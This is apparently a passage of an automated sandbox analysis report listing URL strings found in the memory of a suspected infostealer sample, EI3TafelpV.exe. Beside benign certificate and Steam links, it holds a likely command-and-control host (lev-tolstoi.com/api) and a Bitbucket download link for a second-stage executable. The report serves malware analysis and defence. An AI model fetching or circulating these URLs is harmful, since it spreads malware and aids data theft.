                Source: EI3TafelpV.exe, 00000000.00000002.2031380188.0000000005AA3000.00000004.00000800.00020000.00000000.sdmp, EI3TafelpV.exe, 00000000.00000003.1758335613.0000000005B68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                Source: EI3TafelpV.exe, 00000000.00000002.2031380188.0000000005AA3000.00000004.00000800.00020000.00000000.sdmp, EI3TafelpV.exe, 00000000.00000003.1758335613.0000000005B68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                Source: EI3TafelpV.exe, 00000000.00000002.2031701287.0000000005B67000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/codesigningrootr45.crl0U
                Source: EI3TafelpV.exe, 00000000.00000002.2031701287.0000000005B67000.00000004.00000800.00020000.00000000.sdmp, EI3TafelpV.exe, 00000000.00000002.2031380188.0000000005AA3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
                Source: EI3TafelpV.exe, 00000000.00000003.1539053986.0000000005AE5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
                Source: EI3TafelpV.exe, 00000000.00000002.2031380188.0000000005AA3000.00000004.00000800.00020000.00000000.sdmp, EI3TafelpV.exe, 00000000.00000003.1758335613.0000000005B68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                Source: EI3TafelpV.exe, 00000000.00000003.1539053986.0000000005AE5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                Source: EI3TafelpV.exe, 00000000.00000003.1539053986.0000000005AE5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                Source: EI3TafelpV.exe, 00000000.00000002.2031380188.0000000005AA3000.00000004.00000800.00020000.00000000.sdmp, EI3TafelpV.exe, 00000000.00000003.1758335613.0000000005B68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                Source: EI3TafelpV.exe, 00000000.00000002.2031380188.0000000005AA3000.00000004.00000800.00020000.00000000.sdmp, EI3TafelpV.exe, 00000000.00000003.1758335613.0000000005B68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                Source: EI3TafelpV.exe, 00000000.00000003.1539053986.0000000005AE5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                Source: EI3TafelpV.exe, 00000000.00000003.1539053986.0000000005AE5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
                Source: EI3TafelpV.exe, 00000000.00000003.1758406798.0000000005AD5000.00000004.00000800.00020000.00000000.sdmp, EI3TafelpV.exe, 00000000.00000002.2032287957.0000000006369000.00000002.00000800.00020000.00000000.sdmp, EI3TafelpV.exe, 00000000.00000003.1758335613.0000000005B68000.00000004.00000800.00020000.00000000.sdmp, EI3TafelpV.exe, 00000000.00000003.1758611968.0000000005AAD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
                Source: EI3TafelpV.exe, 00000000.00000003.1539053986.0000000005AE5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                Source: EI3TafelpV.exe, 00000000.00000002.2031380188.0000000005AA3000.00000004.00000800.00020000.00000000.sdmp, EI3TafelpV.exe, 00000000.00000003.1758335613.0000000005B68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
                Source: EI3TafelpV.exe, 00000000.00000002.2031380188.0000000005AA3000.00000004.00000800.00020000.00000000.sdmp, EI3TafelpV.exe, 00000000.00000003.1758335613.0000000005B68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
                Source: EI3TafelpV.exe, 00000000.00000002.2031380188.0000000005AA3000.00000004.00000800.00020000.00000000.sdmp, EI3TafelpV.exe, 00000000.00000003.1758335613.0000000005B68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
                Source: EI3TafelpV.exe, 00000000.00000002.2031701287.0000000005B67000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.globalsign.com/codesigningrootr450F
                Source: EI3TafelpV.exe, 00000000.00000002.2031701287.0000000005B67000.00000004.00000800.00020000.00000000.sdmp, EI3TafelpV.exe, 00000000.00000002.2031380188.0000000005AA3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.globalsign.com/rootr30;
                Source: EI3TafelpV.exe, 00000000.00000003.1539053986.0000000005AE5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                Source: EI3TafelpV.exe, 00000000.00000002.2031701287.0000000005B67000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt0A
                Source: EI3TafelpV.exe, 00000000.00000002.2031701287.0000000005B67000.00000004.00000800.00020000.00000000.sdmp, EI3TafelpV.exe, 00000000.00000002.2031380188.0000000005AA3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/root-r3.crt06
                Source: EI3TafelpV.exe, 00000000.00000003.1467751408.0000000001191000.00000004.00000020.00020000.00000000.sdmp, EI3TafelpV.exe, 00000000.00000003.1467791586.00000000010FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
                Source: EI3TafelpV.exe, 00000000.00000003.1467751408.0000000001191000.00000004.00000020.00020000.00000000.sdmp, EI3TafelpV.exe, 00000000.00000003.1467791586.00000000010FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/privacy_agreement/
                Source: EI3TafelpV.exe, 00000000.00000003.1467751408.0000000001191000.00000004.00000020.00020000.00000000.sdmp, EI3TafelpV.exe, 00000000.00000003.1467791586.00000000010FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/subscriber_agreement/
                Source: EI3TafelpV.exe, 00000000.00000003.1596624552.00000000011A1000.00000004.00000020.00020000.00000000.sdmp, EI3TafelpV.exe, 00000000.00000003.1569669854.0000000001190000.00000004.00000020.00020000.00000000.sdmp, EI3TafelpV.exe, 00000000.00000003.1569789872.0000000001198000.00000004.00000020.00020000.00000000.sdmp, EI3TafelpV.exe, 00000000.00000002.2028909755.00000000011A1000.00000004.00000020.00020000.00000000.sdmp, EI3TafelpV.exe, 00000000.00000003.1613625094.00000000011A1000.00000004.00000020.00020000.00000000.sdmp, EI3TafelpV.exe, 00000000.00000003.1601152613.00000000011A1000.00000004.00000020.00020000.00000000.sdmp, EI3TafelpV.exe, 00000000.00000003.1593153175.000000000119F000.00000004.00000020.00020000.00000000.sdmp, EI3TafelpV.exe, 00000000.00000003.1758765550.000000000119C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowereu
                Source: Amcache.hve.5.drString found in binary or memory: http://upx.sf.net
                Source: EI3TafelpV.exe, 00000000.00000003.1467751408.0000000001191000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.valvesoftware.com/legal.htm
                Source: EI3TafelpV.exe, 00000000.00000003.1539053986.0000000005AE5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                Source: EI3TafelpV.exe, 00000000.00000003.1539053986.0000000005AE5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                Source: EI3TafelpV.exe, 00000000.00000003.1490755306.0000000005AE5000.00000004.00000800.00020000.00000000.sdmp, EI3TafelpV.exe, 00000000.00000003.1490934152.0000000005AE3000.00000004.00000800.00020000.00000000.sdmp, EI3TafelpV.exe, 00000000.00000003.1490831175.0000000005AE3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: EI3TafelpV.exe, 00000000.00000003.1758611968.0000000005AC4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aui-cdn.atlassian.com/
                Source: EI3TafelpV.exe, 00000000.00000003.1467751408.0000000001191000.00000004.00000020.00020000.00000000.sdmp, EI3TafelpV.exe, 00000000.00000003.1467791586.00000000010FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
                Source: EI3TafelpV.exe, 00000000.00000003.1758611968.0000000005AC4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.net
                Source: EI3TafelpV.exe, 00000000.00000003.1758611968.0000000005AC4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-frontbucket-exp.prod-east.frontend.public.atl-paas.net
                Source: EI3TafelpV.exe, 00000000.00000003.1758611968.0000000005AC4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.net
                Source: EI3TafelpV.exe, 00000000.00000003.1758611968.0000000005AC4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net
                Source: EI3TafelpV.exe, 00000000.00000003.1758611968.0000000005AC4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/
                Source: EI3TafelpV.exe, 00000000.00000003.1758611968.0000000005AC4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/;
                Source: EI3TafelpV.exe, 00000000.00000003.1758611968.0000000005AC4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/
                Source: EI3TafelpV.exe, 00000000.00000003.1758765550.000000000119C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbuseruploads.s3.amazonaws.com/
                Source: EI3TafelpV.exe, 00000000.00000003.1758611968.0000000005AC4000.00000004.00000800.00020000.00000000.sdmp, EI3TafelpV.exe, 00000000.00000003.1758765550.000000000119C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbuseruploads.s3.amazonaws.com/70e84e0b-e14f-45c5-ab65-07760e9609fc/downloads/eaef3307-3cc1-
                Source: EI3TafelpV.exe, 00000000.00000002.2028909755.00000000011A1000.00000004.00000020.00020000.00000000.sdmp, EI3TafelpV.exe, 00000000.00000003.1758765550.000000000119C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/
                Source: EI3TafelpV.exe, 00000000.00000002.2028252194.0000000001119000.00000004.00000020.00020000.00000000.sdmp, EI3TafelpV.exe, 00000000.00000002.2028252194.0000000001102000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/mynewworkspace123312/scnd/downloads/FormattingCharitable.exe
                Source: EI3TafelpV.exe, 00000000.00000002.2026141802.0000000000CBB000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/mynewworkspace123312/scnd/downloads/FormattingCharitable.exe.0.0
                Source: EI3TafelpV.exe, 00000000.00000002.2028665716.000000000113E000.00000004.00000020.00020000.00000000.sdmp, EI3TafelpV.exe, 00000000.00000003.1758980695.000000000113D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/mynewworkspace123312/scnd/downloads/FormattingCharitable.exee
                Source: EI3TafelpV.exe, 00000000.00000002.2028252194.0000000001102000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/mynewworkspace123312/scnd/downloads/FormattingCharitable.exeuz
                Source: EI3TafelpV.exe, 00000000.00000003.1540914054.0000000005AC5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696495411400900000.2&ci=1696495411208.
                Source: EI3TafelpV.exe, 00000000.00000003.1540914054.0000000005AC5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696495411400900000.1&ci=1696495411208.12791&cta
                Source: EI3TafelpV.exe, 00000000.00000002.2028252194.0000000001133000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.cookielaw
                Source: EI3TafelpV.exe, 00000000.00000003.1758611968.0000000005AC4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.cookielaw.org/
                Source: EI3TafelpV.exe, 00000000.00000003.1490755306.0000000005AE5000.00000004.00000800.00020000.00000000.sdmp, EI3TafelpV.exe, 00000000.00000003.1490934152.0000000005AE3000.00000004.00000800.00020000.00000000.sdmp, EI3TafelpV.exe, 00000000.00000003.1490831175.0000000005AE3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: EI3TafelpV.exe, 00000000.00000003.1490755306.0000000005AE5000.00000004.00000800.00020000.00000000.sdmp, EI3TafelpV.exe, 00000000.00000003.1490934152.0000000005AE3000.00000004.00000800.00020000.00000000.sdmp, EI3TafelpV.exe, 00000000.00000003.1490831175.0000000005AE3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: EI3TafelpV.exe, 00000000.00000003.1490755306.0000000005AE5000.00000004.00000800.00020000.00000000.sdmp, EI3TafelpV.exe, 00000000.00000003.1490934152.0000000005AE3000.00000004.00000800.00020000.00000000.sdmp, EI3TafelpV.exe, 00000000.00000003.1490831175.0000000005AE3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: EI3TafelpV.exe, 00000000.00000003.1467751408.0000000001191000.00000004.00000020.00020000.00000000.sdmp, EI3TafelpV.exe, 00000000.00000003.1467791586.00000000010FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&a
                Source: EI3TafelpV.exe, 00000000.00000003.1467751408.0000000001191000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_c
                Source: EI3TafelpV.exe, 00000000.00000003.1467751408.0000000001191000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp
                Source: EI3TafelpV.exe, 00000000.00000003.1467751408.0000000001191000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&a
                Source: EI3TafelpV.exe, 00000000.00000003.1467751408.0000000001191000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=eng
                Source: EI3TafelpV.exe, 00000000.00000003.1467751408.0000000001191000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englis
                Source: EI3TafelpV.exe, 00000000.00000003.1467751408.0000000001191000.00000004.00000020.00020000.00000000.sdmp, EI3TafelpV.exe, 00000000.00000003.1467791586.00000000010FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
                Source: EI3TafelpV.exe, 00000000.00000003.1467751408.0000000001191000.00000004.00000020.00020000.00000000.sdmp, EI3TafelpV.exe, 00000000.00000003.1467791586.00000000010FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
                Source: EI3TafelpV.exe, 00000000.00000003.1467751408.0000000001191000.00000004.00000020.00020000.00000000.sdmp, EI3TafelpV.exe, 00000000.00000003.1467791586.00000000010FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
                Source: EI3TafelpV.exe, 00000000.00000003.1467751408.0000000001191000.00000004.00000020.00020000.00000000.sdmp, EI3TafelpV.exe, 00000000.00000003.1467791586.00000000010FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=_92TWn81
                Source: EI3TafelpV.exe, 00000000.00000003.1467751408.0000000001191000.00000004.00000020.00020000.00000000.sdmp, EI3TafelpV.exe, 00000000.00000003.1467791586.00000000010FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=hyEE
                Source: EI3TafelpV.exe, 00000000.00000003.1467751408.0000000001191000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&am
                Source: EI3TafelpV.exe, 00000000.00000003.1467751408.0000000001191000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&l
                Source: EI3TafelpV.exe, 00000000.00000003.1467751408.0000000001191000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&l=engl
                Source: EI3TafelpV.exe, 00000000.00000003.1467751408.0000000001191000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&a
                Source: EI3TafelpV.exe, 00000000.00000003.1467751408.0000000001191000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&l=english&a
                Source: EI3TafelpV.exe, 00000000.00000003.1467751408.0000000001191000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=en
                Source: EI3TafelpV.exe, 00000000.00000003.1467751408.0000000001191000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=eng
                Source: EI3TafelpV.exe, 00000000.00000003.1467751408.0000000001191000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&l=e
                Source: EI3TafelpV.exe, 00000000.00000003.1467751408.0000000001191000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC
                Source: EI3TafelpV.exe, 00000000.00000003.1467751408.0000000001191000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=St3gSJx2HFUZ&l=e
                Source: EI3TafelpV.exe, 00000000.00000003.1467751408.0000000001191000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&
                Source: EI3TafelpV.exe, 00000000.00000003.1467751408.0000000001191000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=engl
                Source: EI3TafelpV.exe, 00000000.00000003.1467751408.0000000001191000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&l=en
                Source: EI3TafelpV.exe, 00000000.00000003.1467751408.0000000001191000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&
                Source: EI3TafelpV.exe, 00000000.00000003.1467751408.0000000001191000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
                Source: EI3TafelpV.exe, 00000000.00000003.1467751408.0000000001191000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png
                Source: EI3TafelpV.exe, 00000000.00000003.1467751408.0000000001191000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
                Source: EI3TafelpV.exe, 00000000.00000003.1467751408.0000000001191000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
                Source: EI3TafelpV.exe, 00000000.00000003.1467751408.0000000001191000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&amp
                Source: EI3TafelpV.exe, 00000000.00000003.1467751408.0000000001191000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&am
                Source: EI3TafelpV.exe, 00000000.00000003.1467751408.0000000001191000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQ
                Source: EI3TafelpV.exe, 00000000.00000003.1467751408.0000000001191000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=en
                Source: EI3TafelpV.exe, 00000000.00000003.1540914054.0000000005AC5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
                Source: EI3TafelpV.exe, 00000000.00000003.1540914054.0000000005AC5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                Source: EI3TafelpV.exe, 00000000.00000003.1490755306.0000000005AE5000.00000004.00000800.00020000.00000000.sdmp, EI3TafelpV.exe, 00000000.00000003.1490934152.0000000005AE3000.00000004.00000800.00020000.00000000.sdmp, EI3TafelpV.exe, 00000000.00000003.1490831175.0000000005AE3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: EI3TafelpV.exe, 00000000.00000003.1490755306.0000000005AE5000.00000004.00000800.00020000.00000000.sdmp, EI3TafelpV.exe, 00000000.00000003.1490934152.0000000005AE3000.00000004.00000800.00020000.00000000.sdmp, EI3TafelpV.exe, 00000000.00000003.1490831175.0000000005AE3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: EI3TafelpV.exe, 00000000.00000003.1490755306.0000000005AE5000.00000004.00000800.00020000.00000000.sdmp, EI3TafelpV.exe, 00000000.00000003.1490934152.0000000005AE3000.00000004.00000800.00020000.00000000.sdmp, EI3TafelpV.exe, 00000000.00000003.1490831175.0000000005AE3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: EI3TafelpV.exe, 00000000.00000002.2028252194.0000000001133000.00000004.00000020.00020000.00000000.sdmp, EI3TafelpV.exe, 00000000.00000003.1759055795.000000000118A000.00000004.00000020.00020000.00000000.sdmp, EI3TafelpV.exe, 00000000.00000003.1758980695.000000000113D000.00000004.00000020.00020000.00000000.sdmp, EI3TafelpV.exe, 00000000.00000003.1758611968.0000000005AC4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dz8aopenkvv6s.cloudfront.net
                Source: EI3TafelpV.exe, 00000000.00000003.1467751408.0000000001191000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/en/
                Source: EI3TafelpV.exe, 00000000.00000003.1540914054.0000000005AC5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqd4plX4pbW1CbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
                Source: EI3TafelpV.exe, 00000000.00000003.1467791586.0000000001141000.00000004.00000020.00020000.00000000.sdmp, EI3TafelpV.exe, 00000000.00000003.1513926322.0000000005AA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/
                Source: EI3TafelpV.exe, 00000000.00000003.1467791586.0000000001102000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/;
                Source: EI3TafelpV.exe, 00000000.00000003.1467791586.0000000001102000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/No
                Source: EI3TafelpV.exe, 00000000.00000002.2028909755.00000000011A1000.00000004.00000020.00020000.00000000.sdmp, EI3TafelpV.exe, 00000000.00000003.1613625094.00000000011A1000.00000004.00000020.00020000.00000000.sdmp, EI3TafelpV.exe, 00000000.00000003.1601152613.00000000011A1000.00000004.00000020.00020000.00000000.sdmp, EI3TafelpV.exe, 00000000.00000003.1758765550.000000000119C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/NoX
                Source: EI3TafelpV.exe, 00000000.00000003.1467791586.0000000001141000.00000004.00000020.00020000.00000000.sdmp, EI3TafelpV.exe, 00000000.00000003.1601152613.00000000011A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/api
                Source: EI3TafelpV.exe, 00000000.00000003.1596624552.00000000011A1000.00000004.00000020.00020000.00000000.sdmp, EI3TafelpV.exe, 00000000.00000003.1593153175.000000000119F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/e
                Source: EI3TafelpV.exe, 00000000.00000003.1596624552.00000000011A1000.00000004.00000020.00020000.00000000.sdmp, EI3TafelpV.exe, 00000000.00000002.2028909755.00000000011A1000.00000004.00000020.00020000.00000000.sdmp, EI3TafelpV.exe, 00000000.00000003.1613625094.00000000011A1000.00000004.00000020.00020000.00000000.sdmp, EI3TafelpV.exe, 00000000.00000003.1601152613.00000000011A1000.00000004.00000020.00020000.00000000.sdmp, EI3TafelpV.exe, 00000000.00000003.1593153175.000000000119F000.00000004.00000020.00020000.00000000.sdmp, EI3TafelpV.exe, 00000000.00000003.1758765550.000000000119C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/es
                Source: EI3TafelpV.exe, 00000000.00000003.1601152613.00000000011A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/es-
                Source: EI3TafelpV.exe, 00000000.00000003.1596624552.00000000011A1000.00000004.00000020.00020000.00000000.sdmp, EI3TafelpV.exe, 00000000.00000003.1593153175.000000000119F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/l
                Source: EI3TafelpV.exe, 00000000.00000003.1613625094.00000000011A1000.00000004.00000020.00020000.00000000.sdmp, EI3TafelpV.exe, 00000000.00000003.1601152613.00000000011A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/msu
                Source: EI3TafelpV.exe, 00000000.00000003.1596624552.00000000011A1000.00000004.00000020.00020000.00000000.sdmp, EI3TafelpV.exe, 00000000.00000003.1467791586.0000000001141000.00000004.00000020.00020000.00000000.sdmp, EI3TafelpV.exe, 00000000.00000003.1601152613.00000000011A1000.00000004.00000020.00020000.00000000.sdmp, EI3TafelpV.exe, 00000000.00000003.1593153175.000000000119F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/pi
                Source: EI3TafelpV.exe, 00000000.00000002.2028252194.0000000001102000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/piS
                Source: EI3TafelpV.exe, 00000000.00000002.2028909755.00000000011A1000.00000004.00000020.00020000.00000000.sdmp, EI3TafelpV.exe, 00000000.00000003.1613625094.00000000011A1000.00000004.00000020.00020000.00000000.sdmp, EI3TafelpV.exe, 00000000.00000003.1601152613.00000000011A1000.00000004.00000020.00020000.00000000.sdmp, EI3TafelpV.exe, 00000000.00000003.1758765550.000000000119C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/rsm
                Source: EI3TafelpV.exe, 00000000.00000003.1758980695.000000000113D000.00000004.00000020.00020000.00000000.sdmp, EI3TafelpV.exe, 00000000.00000003.1758611968.0000000005AC4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://remote-app-switcher.prod-east.frontend.public.atl-paas.net
